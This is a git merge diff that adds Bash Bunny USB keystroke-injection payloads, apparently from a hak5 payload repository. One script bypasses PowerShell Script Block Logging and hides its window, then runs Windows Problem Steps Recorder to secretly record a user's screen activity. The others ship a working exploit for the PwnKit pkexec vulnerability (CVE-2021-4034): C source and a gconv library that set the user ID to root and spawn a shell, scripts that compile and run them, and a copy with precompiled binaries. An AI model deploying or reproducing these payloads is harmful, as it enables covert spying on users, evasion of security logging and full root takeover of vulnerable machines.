Merge branch 'hak5:master' into master
commit
75f1a54282
|
@ -0,0 +1,29 @@
|
|||
# "Microsoft Windows" Problem Steps Recorder
|
||||
|
||||
- Title: Win_ProblemStepsRecorder
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Microsoft Windows
|
||||
- Category: Credentials
|
||||
|
||||
## Description
|
||||
|
||||
1) Partially avoids "PowerShell Script Block Logging".
|
||||
2) Closing of all windows.
|
||||
3) Hide "PowerShell" window.
|
||||
4) Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
|
||||
5) Writes the file system cache to disk.
|
||||
6) Safely eject.
|
||||
|
||||
## Configuration
|
||||
|
||||
From "payload.txt" change the values of the following constants :
|
||||
```bash
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
readonly RECORDER_TIME=300
|
||||
|
||||
|
||||
```
|
|
@ -0,0 +1,50 @@
|
|||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
#
|
||||
|
||||
Param (
|
||||
[String] $BB_VOLUME,
|
||||
[Int] $RECORDER_TIME
|
||||
)
|
||||
|
||||
# Partially avoids "PowerShell Script Block Logging".
|
||||
#
|
||||
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
|
||||
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
|
||||
$etw_provider.SetValue($null, $event_provider)
|
||||
|
||||
# Closing of all windows.
|
||||
#
|
||||
Get-Process -Name "explorer" | Stop-Process
|
||||
|
||||
# Hide "PowerShell" window.
|
||||
#
|
||||
$Script:showWindowAsync = Add-Type -MemberDefinition @"
|
||||
[DllImport("user32.dll")]
|
||||
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
|
||||
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
|
||||
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
|
||||
|
||||
If ((Test-Path -Path "C:\Windows\System32\psr.exe")) {
|
||||
|
||||
$bb_loot = "${BB_VOLUME}loot\"
|
||||
$computer_name = $env:COMPUTERNAME
|
||||
|
||||
# Abuse of "Windows Problem Steps Recorder" to spy on a user's activities.
|
||||
#
|
||||
(C:\Windows\System32\psr.exe /start /sc 1 /maxsc 999 /gui 0 /sketch 1 /slides 1 /output "${bb_loot}${computer_name}_record.zip") | Out-Null
|
||||
Start-Sleep -Seconds $RECORDER_TIME
|
||||
(C:\Windows\System32\psr.exe /stop) | Out-Null
|
||||
|
||||
}
|
||||
|
||||
"Win_ProblemStepsRecorder terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
|
||||
|
||||
# Writes the file system cache to disk.
|
||||
#
|
||||
Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
|
||||
|
||||
# Safely eject.
|
||||
#
|
||||
(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject")
|
|
@ -0,0 +1,91 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Win_ProblemStepsRecorder
|
||||
#
|
||||
# Description:
|
||||
# Abuse of "Windows Problem Steps Recorder"
|
||||
# to spy on a user's activities.
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Target: Since Microsoft Windows 7 and 2008 R2
|
||||
# Attackmodes: HID and STORAGE
|
||||
#
|
||||
# TESTED ON
|
||||
# ===============
|
||||
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
|
||||
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
|
||||
#
|
||||
# NOTE
|
||||
# ===============
|
||||
# Use the browser "Internet Explorer" to read the ".mht" file correctly.
|
||||
#
|
||||
# STATUS
|
||||
# ===============
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Yellow double blink ............................. STAGE2
|
||||
# Yellow triple blink ............................. STAGE3
|
||||
# Cyan inverted single blink ...................... SPECIAL
|
||||
# White fast blink ................................ CLEANUP
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
readonly RECORDER_TIME=300
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
udisk mount
|
||||
|
||||
######## ATTACK ########
|
||||
|
||||
LED ATTACK
|
||||
|
||||
Q DELAY 7000
|
||||
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
|
||||
Q DELAY 7000
|
||||
|
||||
LED STAGE2
|
||||
|
||||
Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
|
||||
Q ENTER
|
||||
Q DELAY 3500
|
||||
|
||||
Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "CD \"\${BB_SWITCH}\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE3
|
||||
|
||||
Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -RECORDER_TIME ${RECORDER_TIME}"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED SPECIAL
|
||||
|
||||
until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done
|
||||
|
||||
######## CLEANUP ########
|
||||
|
||||
LED CLEANUP
|
||||
|
||||
rm /root/udisk/loot/done.txt
|
||||
sync
|
||||
udisk unmount
|
||||
|
||||
######## FINISH ########
|
||||
|
||||
LED FINISH
|
||||
|
||||
shutdown -h 0
|
|
@ -0,0 +1,21 @@
|
|||
#include <unistd.h>
|
||||
|
||||
int main() {
|
||||
|
||||
char * const ARGUMENTS[] = {
|
||||
NULL
|
||||
};
|
||||
|
||||
char * const ENVIRONMENT[] = {
|
||||
"pwnkit.so:.",
|
||||
"PATH=GCONV_PATH=.",
|
||||
"SHELL=PWNKIT",
|
||||
"CHARSET=PWNKIT",
|
||||
NULL
|
||||
};
|
||||
|
||||
execve("/usr/bin/pkexec", ARGUMENTS, ENVIRONMENT);
|
||||
|
||||
return(0);
|
||||
|
||||
}
|
|
@ -0,0 +1,24 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
|
||||
void gconv() {}
|
||||
|
||||
void gconv_init() {
|
||||
|
||||
char * const ARGUMENTS[] = {
|
||||
"/bin/sh",
|
||||
NULL
|
||||
};
|
||||
|
||||
char * const ENVIRONMENT[] = {
|
||||
"PATH=/bin:/sbin:/usr/bin:/usr/sbin/",
|
||||
NULL
|
||||
};
|
||||
|
||||
setuid(0);
|
||||
setgid(0);
|
||||
execve(ARGUMENTS[0], ARGUMENTS, ENVIRONMENT);
|
||||
exit(0);
|
||||
|
||||
}
|
|
@ -0,0 +1,26 @@
|
|||
# PwnKit Vulnerability - Local Privilege Escalation
|
||||
|
||||
- Title: PwnKit Vulnerability - Local Privilege Escalation
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Linux
|
||||
- Category: Execution
|
||||
- Credits: Qualys Research Team
|
||||
|
||||
## Description
|
||||
|
||||
The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
|
||||
|
||||
[PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
|
||||
|
||||
## Configuration
|
||||
|
||||
From "payload.txt" change the values of the following constant :
|
||||
```bash
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
|
||||
|
||||
```
|
|
@ -0,0 +1,112 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: PwnKit Vulnerability - Local Privilege Escalation
|
||||
#
|
||||
# Description:
|
||||
# The Qualys Research Team has discovered a memory corruption
|
||||
# vulnerability in polkit’s pkexec, a SUID-root program that
|
||||
# is installed by default on every major Linux distribution.
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Target: Linux
|
||||
# Attackmodes: HID and STORAGE
|
||||
#
|
||||
# TESTED ON
|
||||
# ===============
|
||||
# Ubuntu 20.04.3 LTS x86_64
|
||||
# pkexec version 0.105
|
||||
#
|
||||
# STATUS
|
||||
# ===============
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Yellow double blink ............................. STAGE2
|
||||
# Yellow triple blink ............................. STAGE3
|
||||
# Yellow quadruple blink .......................... STAGE4
|
||||
# White fast blink ................................ CLEANUP
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
udisk mount
|
||||
|
||||
######## ATTACK ########
|
||||
|
||||
LED ATTACK
|
||||
|
||||
Q DELAY 7000
|
||||
RUN UNITY xterm
|
||||
Q DELAY 7000
|
||||
|
||||
LED STAGE2
|
||||
|
||||
Q STRING "cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/CVE-2021-4034_files/"
|
||||
Q ENTER
|
||||
Q DELAY 3500
|
||||
|
||||
Q STRING "mkdir /tmp/pwnkit_lpe/"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE3
|
||||
|
||||
Q STRING "echo \"module UTF-8// PWNKIT// pwnkit 1\" > /tmp/pwnkit_lpe/gconv-modules"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "mkdir -p \"/tmp/pwnkit_lpe/GCONV_PATH=.\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "cp /usr/bin/true \"/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:.\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE4
|
||||
|
||||
Q STRING "cd /tmp/pwnkit_lpe/"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "/usr/bin/pkexec --version"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "./pwnkit"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "id"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
######## CLEANUP ########
|
||||
|
||||
LED CLEANUP
|
||||
|
||||
sync
|
||||
udisk unmount
|
||||
|
||||
######## FINISH ########
|
||||
|
||||
LED FINISH
|
||||
|
||||
shutdown -h 0
|
|
@ -0,0 +1,21 @@
|
|||
#include <unistd.h>
|
||||
|
||||
int main() {
|
||||
|
||||
char * const ARGUMENTS[] = {
|
||||
NULL
|
||||
};
|
||||
|
||||
char * const ENVIRONMENT[] = {
|
||||
"pwnkit.so:.",
|
||||
"PATH=GCONV_PATH=.",
|
||||
"SHELL=PWNKIT",
|
||||
"CHARSET=PWNKIT",
|
||||
NULL
|
||||
};
|
||||
|
||||
execve("/usr/bin/pkexec", ARGUMENTS, ENVIRONMENT);
|
||||
|
||||
return(0);
|
||||
|
||||
}
|
|
@ -0,0 +1,24 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <unistd.h>
|
||||
|
||||
void gconv() {}
|
||||
|
||||
void gconv_init() {
|
||||
|
||||
char * const ARGUMENTS[] = {
|
||||
"/bin/sh",
|
||||
NULL
|
||||
};
|
||||
|
||||
char * const ENVIRONMENT[] = {
|
||||
"PATH=/bin:/sbin:/usr/bin:/usr/sbin/",
|
||||
NULL
|
||||
};
|
||||
|
||||
setuid(0);
|
||||
setgid(0);
|
||||
execve(ARGUMENTS[0], ARGUMENTS, ENVIRONMENT);
|
||||
exit(0);
|
||||
|
||||
}
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,36 @@
|
|||
# PwnKit Vulnerability - Local Privilege Escalation - Compiled
|
||||
|
||||
- Title: PwnKit Vulnerability - Local Privilege Escalation
|
||||
- Author: TW-D
|
||||
- Version: 1.0
|
||||
- Target: Linux
|
||||
- Category: Execution
|
||||
- Credits: Qualys Research Team
|
||||
|
||||
## Description
|
||||
|
||||
This is a version of the PwnKit Vulnerability Local Privilege Escalation containing pre-compiled binaries for x86_64 Linux. If you don't want to use the pre-compiled binaries or you are targetting a different architecture, please find the `PwnKit-LPE` directory.
|
||||
|
||||
The Qualys Research Team has discovered a memory corruption vulnerability in polkit’s pkexec, a SUID-root program that is installed by default on every major Linux distribution. This easily exploited vulnerability allows any unprivileged user to gain full root privileges on a vulnerable host by exploiting this vulnerability in its default configuration.
|
||||
|
||||
[PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)](https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034)
|
||||
|
||||
## Configuration
|
||||
|
||||
From "payload.txt" change the values of the following constant :
|
||||
```bash
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
|
||||
|
||||
```
|
||||
|
||||
## Checksums
|
||||
|
||||
>
|
||||
> 9e2c0af3d55192449760f1364a67f290554b98cdbe9ace9f84e6c33ea3e957eb ./CVE-2021-4034_files/pwnkit
|
||||
>
|
||||
> acd21bf70492d22317a4592551dcd4666a693b9622ddf952e63cf3ce288f3745 ./CVE-2021-4034_files/pwnkit.so
|
||||
>
|
|
@ -0,0 +1,116 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: PwnKit Vulnerability - Local Privilege Escalation
|
||||
#
|
||||
# Description:
|
||||
# The Qualys Research Team has discovered a memory corruption
|
||||
# vulnerability in polkit’s pkexec, a SUID-root program that
|
||||
# is installed by default on every major Linux distribution.
|
||||
#
|
||||
# Author: TW-D
|
||||
# Version: 1.0
|
||||
# Category: Execution
|
||||
# Target: Linux
|
||||
# Attackmodes: HID and STORAGE
|
||||
#
|
||||
# TESTED ON
|
||||
# ===============
|
||||
# Ubuntu 20.04.3 LTS x86_64
|
||||
# pkexec version 0.105
|
||||
#
|
||||
# STATUS
|
||||
# ===============
|
||||
# Magenta solid ................................... SETUP
|
||||
# Yellow single blink ............................. ATTACK
|
||||
# Yellow double blink ............................. STAGE2
|
||||
# Yellow triple blink ............................. STAGE3
|
||||
# Yellow quadruple blink .......................... STAGE4
|
||||
# White fast blink ................................ CLEANUP
|
||||
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
|
||||
|
||||
######## INITIALIZATION ########
|
||||
|
||||
readonly BB_LABEL="BashBunny"
|
||||
|
||||
######## SETUP ########
|
||||
|
||||
LED SETUP
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
GET SWITCH_POSITION
|
||||
udisk mount
|
||||
|
||||
######## ATTACK ########
|
||||
|
||||
LED ATTACK
|
||||
|
||||
Q DELAY 7000
|
||||
RUN UNITY xterm
|
||||
Q DELAY 7000
|
||||
|
||||
LED STAGE2
|
||||
|
||||
Q STRING "cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/CVE-2021-4034_files/"
|
||||
Q ENTER
|
||||
Q DELAY 3500
|
||||
|
||||
Q STRING "mkdir /tmp/pwnkit_lpe/"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "cp pwnkit.so /tmp/pwnkit_lpe/pwnkit.so"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "cp pwnkit /tmp/pwnkit_lpe/pwnkit"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE3
|
||||
|
||||
Q STRING "echo \"module UTF-8// PWNKIT// pwnkit 1\" > /tmp/pwnkit_lpe/gconv-modules"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "mkdir -p \"/tmp/pwnkit_lpe/GCONV_PATH=.\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "cp /usr/bin/true \"/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:.\""
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE4
|
||||
|
||||
Q STRING "cd /tmp/pwnkit_lpe/"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "/usr/bin/pkexec --version"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "chmod +x ./pwnkit"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "./pwnkit"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
Q STRING "id"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
######## CLEANUP ########
|
||||
|
||||
LED CLEANUP
|
||||
|
||||
sync
|
||||
udisk unmount
|
||||
|
||||
######## FINISH ########
|
||||
|
||||
LED FINISH
|
||||
|
||||
shutdown -h 0
|
Loading…
Reference in New Issue